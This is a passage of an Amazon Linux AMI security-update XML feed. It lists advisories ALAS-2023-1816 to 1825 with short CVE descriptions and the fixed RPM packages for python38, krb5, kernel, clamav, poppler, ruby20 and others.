name="php72-pecl-imagick" version="3.4.4" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-3.4.4-2.10.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick-devel" version="3.4.4" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-devel-3.4.4-2.10.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick-debuginfo" version="3.4.4" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-debuginfo-3.4.4-2.10.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick-devel" version="3.4.4" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pecl-imagick-devel-3.4.4-2.10.amzn1.i686.rpm</filename></package><package name="php72-pecl-imagick-debuginfo" version="3.4.4" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pecl-imagick-debuginfo-3.4.4-2.10.amzn1.i686.rpm</filename></package><package name="php72-pecl-imagick" version="3.4.4" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pecl-imagick-3.4.4-2.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1816</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1816: important priority package update for python38</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-40217:
An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers (such as HTTP servers) that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSLSocket instance will detect the socket as "not connected" and won't initiate a handshake, but buffered data will still be readable from the socket buffer. This data will not be authenticated if the server-side TLS peer is expecting client certificate authentication, and is indistinguishable from valid TLS stream data. Data is limited in size to the amount that will fit in the buffer. (The TLS connection cannot directly be used for data exfiltration because the vulnerable code path requires that the connection be closed on initialization of the SSLSocket.)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40217" title="" id="CVE-2023-40217" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python38" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debug-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-devel-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-debuginfo-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-libs-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-tools-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python38-test-3.8.5-1.10.amzn1.x86_64.rpm</filename></package><package name="python38" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-debug" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debug-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-debuginfo" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-debuginfo-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-tools" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-tools-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-devel" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-devel-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-test" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-test-3.8.5-1.10.amzn1.i686.rpm</filename></package><package name="python38-libs" version="3.8.5" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/python38-libs-3.8.5-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1817</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1817: important priority package update for ca-certificates</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-37920:
Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi prior to version 2023.07.22 recognizes "e-Tugra" root certificates. e-Tugra's root certificates were subject to an investigation prompted by reporting of security issues in their systems. Certifi 2023.07.22 removes root certificates from "e-Tugra" from the root store.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-37920" title="" id="CVE-2023-37920" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ca-certificates" version="2018.2.22" release="65.1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/ca-certificates-2018.2.22-65.1.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1818</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1818: medium priority package update for krb5</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-36054:
lib/kadm5/kadm_rpc_xdr.c in MIT Kerberos 5 (aka krb5) before 1.20.2 and 1.21.x before 1.21.1 frees an uninitialized pointer. A remote authenticated user can trigger a kadmind crash. This occurs because _xdr_kadm5_principal_ent_rec does not validate the relationship between n_key_data and the key_data array count.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36054" title="" id="CVE-2023-36054" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-server" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="55.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-55.52.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-55.52.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="55.52.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-55.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1819</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1819: medium priority package update for kernel</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-20588:
A division-by-zero error on some AMD processors can potentially return speculative data resulting in loss of confidentiality.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20588" title="" id="CVE-2023-20588" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.322-170.538.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.322-170.538.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.322" release="170.538.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.322-170.538.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1820</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1820: important priority package update for clamav</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-20197:
A vulnerability in the filesystem image parser for Hierarchical File System Plus (HFS+) of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.
This vulnerability is due to an incorrect check for completion when a file is decompressed, which may result in a loop condition that could cause the affected software to stop responding. An attacker could exploit this vulnerability by submitting a crafted HFS+ filesystem image to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to stop responding, resulting in a DoS condition on the affected software and consuming available system resources.
For a description of this vulnerability, see the ClamAV blog .
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20197" title="" id="CVE-2023-20197" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamd" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.103.9" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.103.9-1.55.amzn1.noarch.rpm</filename></package><package name="clamav" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-debuginfo" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.103.9" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.103.9-1.55.amzn1.noarch.rpm</filename></package><package name="clamav-lib" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-update" version="0.103.9" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.103.9-1.55.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav-lib" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.103.9-1.55.amzn1.i686.rpm</filename></package><package name="clamd" version="0.103.9" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.103.9-1.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1821</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1821: medium priority package update for poppler</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37050:
In Poppler 22.07.0, PDFDoc::savePageAs in PDFDoc.c callows attackers to cause a denial-of-service (application crashes with SIGABRT) by crafting a PDF file in which the xref data structure is mishandled in getCatalog processing. Note that this vulnerability is caused by the incomplete patch of CVE-2018-20662.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37050" title="" id="CVE-2022-37050" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-glib-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-43.24.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-43.24.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="43.24.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-43.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1823</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1823: medium priority package update for poppler</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-18839:
Buffer Overflow vulnerability in HtmlOutputDev::page in poppler 0.75.0 allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-18839" title="" id="CVE-2020-18839" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-43.25.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-43.25.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="43.25.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-43.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1824</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1824: medium priority package update for ruby20</title><issued date="2023-08-30 17:56:00" /><updated date="2023-09-09 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-9224:
An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9224" title="" id="CVE-2017-9224" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem20-io-console" version="0.4.2" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-2.42.amzn1.x86_64.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-2.42.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-2.42.amzn1.noarch.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="2.42.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-2.42.amzn1.noarch.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-2.42.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-2.42.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-2.42.amzn1.noarch.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.42.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="2.42.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-2.42.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-2.42.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.42.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-2.42.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-2.42.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-2.42.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-2.42.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.42.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-2.42.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.42.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1825</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1825: important priority package update for amazon-ssm-agent</title><issued date="2023-08-30 18:41:00" /><updated date="2023-09-09 00:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41723:
http2/hpack: avoid quadratic complexity in hpack decoding
CVE-2022-27664:
In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.
CVE-2022-27191:
